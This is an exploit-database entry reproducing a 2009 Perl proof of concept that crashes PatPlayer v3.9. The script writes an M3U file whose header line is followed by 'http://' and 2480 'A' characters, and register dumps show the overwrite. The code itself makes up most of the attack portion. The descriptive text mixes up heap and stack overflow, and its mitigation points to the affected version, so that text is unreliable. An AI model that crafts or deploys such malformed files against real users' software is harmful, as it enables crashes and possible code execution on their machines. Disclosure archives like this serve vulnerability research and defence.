PatPlayer v3.9 (M3U File) Local Heap Overflow PoC

vendor:

PatPlayer

by:

Cyber-Zone (ABDELKHALEK)

7,5

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: PatPlayer

Affected Version From: 3.9

Affected Version To: 3.9

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

PatPlayer v3.9 (M3U File) Local Heap Overflow PoC

PatPlayer v3.9 is vulnerable to a local heap overflow vulnerability when a specially crafted M3U file is opened. The vulnerability is caused due to a boundary error when handling the '#EXTM3U' header of the M3U file. This can be exploited to cause a stack-based buffer overflow by overflowing a buffer with a specially crafted M3U file containing an overly long '#EXTM3U' header.

Mitigation:

Upgrade to the latest version of PatPlayer v3.9 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
#
# PatPlayer v3.9 (M3U File) Local Heap Overflow PoC
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY ....
#
#
#EAX 41414141
#ECX 00000000
#EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBX 00B928DC
#ESP 0012FD2C
#EBP 0012FD78
#ESI 004F1CCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 004EEA78 PatPlaye.004EEA78
#EIP 00404C59 PatPlaye.00404C59
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 2480; # Random

open(MYFILE,'>>cyber.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

# milw0rm.com [2009-07-10]